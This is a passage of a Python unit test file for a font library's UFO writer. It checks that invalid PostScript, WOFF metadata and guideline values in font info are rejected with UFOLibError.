# postscriptUnderlineThickness
infoObject = self.makeInfoObject()
infoObject.postscriptUnderlineThickness = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptUnderlinePosition
infoObject = self.makeInfoObject()
infoObject.postscriptUnderlinePosition = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptIsFixedPitch
infoObject = self.makeInfoObject()
infoObject.postscriptIsFixedPitch = 2
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptBlueValues
## not a list
infoObject = self.makeInfoObject()
infoObject.postscriptBlueValues = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## uneven value count
infoObject = self.makeInfoObject()
infoObject.postscriptBlueValues = [500]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## too many values
infoObject = self.makeInfoObject()
infoObject.postscriptBlueValues = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptOtherBlues
## not a list
infoObject = self.makeInfoObject()
infoObject.postscriptOtherBlues = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## uneven value count
infoObject = self.makeInfoObject()
infoObject.postscriptOtherBlues = [500]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## too many values
infoObject = self.makeInfoObject()
infoObject.postscriptOtherBlues = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptFamilyBlues
## not a list
infoObject = self.makeInfoObject()
infoObject.postscriptFamilyBlues = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## uneven value count
infoObject = self.makeInfoObject()
infoObject.postscriptFamilyBlues = [500]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## too many values
infoObject = self.makeInfoObject()
infoObject.postscriptFamilyBlues = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptFamilyOtherBlues
## not a list
infoObject = self.makeInfoObject()
infoObject.postscriptFamilyOtherBlues = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## uneven value count
infoObject = self.makeInfoObject()
infoObject.postscriptFamilyOtherBlues = [500]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## too many values
infoObject = self.makeInfoObject()
infoObject.postscriptFamilyOtherBlues = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptStemSnapH
## not list
infoObject = self.makeInfoObject()
infoObject.postscriptStemSnapH = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## too many values
infoObject = self.makeInfoObject()
infoObject.postscriptStemSnapH = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptStemSnapV
## not list
infoObject = self.makeInfoObject()
infoObject.postscriptStemSnapV = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## too many values
infoObject = self.makeInfoObject()
infoObject.postscriptStemSnapV = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptBlueFuzz
infoObject = self.makeInfoObject()
infoObject.postscriptBlueFuzz = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptBlueShift
infoObject = self.makeInfoObject()
infoObject.postscriptBlueShift = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptBlueScale
infoObject = self.makeInfoObject()
infoObject.postscriptBlueScale = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptForceBold
infoObject = self.makeInfoObject()
infoObject.postscriptForceBold = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptDefaultWidthX
infoObject = self.makeInfoObject()
infoObject.postscriptDefaultWidthX = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptNominalWidthX
infoObject = self.makeInfoObject()
infoObject.postscriptNominalWidthX = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptWeightName
infoObject = self.makeInfoObject()
infoObject.postscriptWeightName = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptDefaultCharacter
infoObject = self.makeInfoObject()
infoObject.postscriptDefaultCharacter = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# postscriptWindowsCharacterSet
infoObject = self.makeInfoObject()
infoObject.postscriptWindowsCharacterSet = -1
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# macintoshFONDFamilyID
infoObject = self.makeInfoObject()
infoObject.macintoshFONDFamilyID = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# macintoshFONDName
infoObject = self.makeInfoObject()
infoObject.macintoshFONDName = 123
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
def testWOFFWrite(self):
# woffMajorVersion
infoObject = self.makeInfoObject()
infoObject.woffMajorVersion = 1.0
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.woffMajorVersion = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# woffMinorVersion
infoObject = self.makeInfoObject()
infoObject.woffMinorVersion = 1.0
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.woffMinorVersion = "abc"
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# woffMetadataUniqueID
## none
infoObject = self.makeInfoObject()
infoObject.woffMetadataUniqueID = None
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(TestInfoObject())
self.tearDownUFO()
## not a dict
infoObject = self.makeInfoObject()
infoObject.woffMetadataUniqueID = 1
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## unknown key
infoObject = self.makeInfoObject()
infoObject.woffMetadataUniqueID = dict(id="foo", notTheRightKey=1)
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## no id
infoObject = self.makeInfoObject()
infoObject.woffMetadataUniqueID = dict()
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## not a string for id
infoObject = self.makeInfoObject()
infoObject.woffMetadataUniqueID = dict(id=1)
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## empty string
infoObject = self.makeInfoObject()
infoObject.woffMetadataUniqueID = dict(id="")
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(TestInfoObject())
self.tearDownUFO()
# woffMetadataVendor
## no name
infoObject = self.makeInfoObject()
infoObject.woffMetadataVendor = dict(url="foo")
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## name not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataVendor = dict(name=1, url="foo")
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## name an empty string
infoObject = self.makeInfoObject()
infoObject.woffMetadataVendor = dict(name="", url="foo")
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(TestInfoObject())
self.tearDownUFO()
## no URL
infoObject = self.makeInfoObject()
infoObject.woffMetadataVendor = dict(name="foo")
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(TestInfoObject())
self.tearDownUFO()
## url not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataVendor = dict(name="foo", url=1)
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## url empty string
infoObject = self.makeInfoObject()
infoObject.woffMetadataVendor = dict(name="foo", url="")
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(TestInfoObject())
self.tearDownUFO()
## have dir
infoObject = self.makeInfoObject()
infoObject.woffMetadataVendor = dict(name="foo", url="bar", dir="ltr")
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(TestInfoObject())
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.woffMetadataVendor = dict(name="foo", url="bar", dir="rtl")
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(TestInfoObject())
self.tearDownUFO()
## dir not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataVendor = dict(name="foo", url="bar", dir=1)
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## dir not ltr or rtl
infoObject = self.makeInfoObject()
infoObject.woffMetadataVendor = dict(name="foo", url="bar", dir="utd")
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## have class
infoObject = self.makeInfoObject()
infoObject.woffMetadataVendor = {"name" : "foo", "url" : "bar", "class" : "hello"}
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(TestInfoObject())
self.tearDownUFO()
## class not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataVendor = {"name" : "foo", "url" : "bar", "class" : 1}
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## class empty string
infoObject = self.makeInfoObject()
infoObject.woffMetadataVendor = {"name" : "foo", "url" : "bar", "class" : ""}
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(TestInfoObject())
self.tearDownUFO()
# woffMetadataCredits
## no credits attribute
infoObject = self.makeInfoObject()
infoObject.woffMetadataCredits = {}
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## unknown attribute
infoObject = self.makeInfoObject()
infoObject.woffMetadataCredits = dict(credits=[dict(name="foo")], notTheRightKey=1)
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## not a list
infoObject = self.makeInfoObject()
infoObject.woffMetadataCredits = dict(credits="abc")
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## no elements in credits
infoObject = self.makeInfoObject()
infoObject.woffMetadataCredits = dict(credits=[])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## credit not a dict
infoObject = self.makeInfoObject()
infoObject.woffMetadataCredits = dict(credits=["abc"])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## unknown key
infoObject = self.makeInfoObject()
infoObject.woffMetadataCredits = dict(credits=[dict(name="foo", notTheRightKey=1)])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## no name
infoObject = self.makeInfoObject()
infoObject.woffMetadataCredits = dict(credits=[dict(url="foo")])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## name not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataCredits = dict(credits=[dict(name=1)])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## url not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataCredits = dict(credits=[dict(name="foo", url=1)])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## role not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataCredits = dict(credits=[dict(name="foo", role=1)])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## dir not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataCredits = dict(credits=[dict(name="foo", dir=1)])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## dir not ltr or rtl
infoObject = self.makeInfoObject()
infoObject.woffMetadataCredits = dict(credits=[dict(name="foo", dir="utd")])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## class not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataCredits = dict(credits=[{"name" : "foo", "class" : 1}])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# woffMetadataDescription
## no url
infoObject = self.makeInfoObject()
infoObject.woffMetadataDescription = dict(text=[dict(text="foo")])
writer.writeInfo(TestInfoObject())
self.tearDownUFO()
## url not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataDescription = dict(text=[dict(text="foo")], url=1)
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## no text
infoObject = self.makeInfoObject()
infoObject.woffMetadataDescription = dict(url="foo")
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text not a list
infoObject = self.makeInfoObject()
infoObject.woffMetadataDescription = dict(text="abc")
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text item not a dict
infoObject = self.makeInfoObject()
infoObject.woffMetadataDescription = dict(text=["abc"])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text item unknown key
infoObject = self.makeInfoObject()
infoObject.woffMetadataDescription = dict(text=[dict(text="foo", notTheRightKey=1)])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text item missing text
infoObject = self.makeInfoObject()
infoObject.woffMetadataDescription = dict(text=[dict(language="foo")])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataDescription = dict(text=[dict(text=1)])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## url not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataDescription = dict(text=[dict(text="foo", url=1)])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## language not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataDescription = dict(text=[dict(text="foo", language=1)])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## dir not ltr or rtl
infoObject = self.makeInfoObject()
infoObject.woffMetadataDescription = dict(text=[dict(text="foo", dir="utd")])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## class not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataDescription = dict(text=[{"text" : "foo", "class" : 1}])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# woffMetadataLicense
## no url
infoObject = self.makeInfoObject()
infoObject.woffMetadataLicense = dict(text=[dict(text="foo")])
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(TestInfoObject())
self.tearDownUFO()
## url not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataLicense = dict(text=[dict(text="foo")], url=1)
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## id not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataLicense = dict(text=[dict(text="foo")], id=1)
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## no text
infoObject = self.makeInfoObject()
infoObject.woffMetadataLicense = dict(url="foo")
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(TestInfoObject())
self.tearDownUFO()
## text not a list
infoObject = self.makeInfoObject()
infoObject.woffMetadataLicense = dict(text="abc")
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text item not a dict
infoObject = self.makeInfoObject()
infoObject.woffMetadataLicense = dict(text=["abc"])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text item unknown key
infoObject = self.makeInfoObject()
infoObject.woffMetadataLicense = dict(text=[dict(text="foo", notTheRightKey=1)])
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text item missing text
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataLicense = dict(text=[dict(language="foo")])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text not a string
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataLicense = dict(text=[dict(text=1)])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## url not a string
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataLicense = dict(text=[dict(text="foo", url=1)])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## language not a string
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataLicense = dict(text=[dict(text="foo", language=1)])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## dir not ltr or rtl
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataLicense = dict(text=[dict(text="foo", dir="utd")])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## class not a string
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataLicense = dict(text=[{"text" : "foo", "class" : 1}])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# woffMetadataCopyright
## unknown attribute
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataCopyright = dict(text=[dict(text="foo")], notTheRightKey=1)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## no text
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataCopyright = dict()
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text not a list
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataCopyright = dict(text="abc")
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text item not a dict
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataCopyright = dict(text=["abc"])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text item unknown key
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataCopyright = dict(text=[dict(text="foo", notTheRightKey=1)])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text item missing text
infoObject = self.makeInfoObject()
infoObject.woffMetadataCopyright = dict(text=[dict(language="foo")])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text not a string
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataCopyright = dict(text=[dict(text=1)])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## url not a string
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataCopyright = dict(text=[dict(text="foo", url=1)])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## language not a string
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataCopyright = dict(text=[dict(text="foo", language=1)])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## dir not ltr or rtl
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataCopyright = dict(text=[dict(text="foo", dir="utd")])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## class not a string
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataCopyright = dict(text=[{"text" : "foo", "class" : 1}])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# woffMetadataTrademark
## unknown attribute
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataTrademark = dict(text=[dict(text="foo")], notTheRightKey=1)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## no text
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataTrademark = dict()
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text not a list
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataTrademark = dict(text="abc")
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text item not a dict
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataTrademark = dict(text=["abc"])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text item unknown key
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataTrademark = dict(text=[dict(text="foo", notTheRightKey=1)])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text item missing text
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataTrademark = dict(text=[dict(language="foo")])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## text not a string
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataTrademark = dict(text=[dict(text=1)])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## url not a string
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataTrademark = dict(text=[dict(text="foo", url=1)])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## language not a string
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataTrademark = dict(text=[dict(text="foo", language=1)])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## dir not ltr or rtl
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataTrademark = dict(text=[dict(text="foo", dir="utd")])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## class not a string
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataTrademark = dict(text=[{"text" : "foo", "class" : 1}])
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# woffMetadataLicensee
## no name
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataLicensee = dict()
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## unknown attribute
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataLicensee = dict(name="foo", notTheRightKey=1)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## name not a string
infoObject = self.makeInfoObject()
writer = UFOWriter(self.dstDir, formatVersion=3)
infoObject.woffMetadataLicensee = dict(name=1)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## dir options
infoObject = self.makeInfoObject()
infoObject.woffMetadataLicensee = dict(name="foo", dir="ltr")
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(infoObject)
self.tearDownUFO()
infoObject = self.makeInfoObject()
infoObject.woffMetadataLicensee = dict(name="foo", dir="rtl")
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(infoObject)
self.tearDownUFO()
## dir not ltr or rtl
infoObject = self.makeInfoObject()
infoObject.woffMetadataLicensee = dict(name="foo", dir="utd")
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
## have class
infoObject = self.makeInfoObject()
infoObject.woffMetadataLicensee = {"name" : "foo", "class" : "hello"}
writer = UFOWriter(self.dstDir, formatVersion=3)
writer.writeInfo(infoObject)
self.tearDownUFO()
## class not a string
infoObject = self.makeInfoObject()
infoObject.woffMetadataLicensee = {"name" : "foo", "class" : 1}
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
def testGuidelinesWrite(self):
# x
## not an int or float
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(x="1")]
writer = UFOWriter(self.dstDir, formatVersion=3)
self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
self.tearDownUFO()
# y
## not an int or float
infoObject = self.makeInfoObject()
infoObject.guidelines = [dict(y="1")]
